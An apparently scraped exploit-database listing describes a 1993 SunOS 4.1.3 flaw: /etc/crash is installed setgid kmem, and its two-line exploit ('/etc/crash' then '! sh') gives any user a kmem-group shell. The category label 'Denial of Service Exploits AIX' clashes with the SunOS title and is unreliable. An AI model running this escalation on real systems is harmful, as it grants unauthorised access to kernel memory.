SunOS <= 4.1.3 kmem setgid /etc/crash Vulnerability

Exploit Datenbank (exploit-db.com)
CVE Datenbank (cve.mitre.org)
OSVDB Datenbank (osvdb.org)
Mike Frantzen 03.02.1993 Verified
Denial of Service Exploits AIX

Exploit Code

Code Download 
source: http://www.securityfocus.com/bid/59/info

/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.

$ /etc/crash
! sh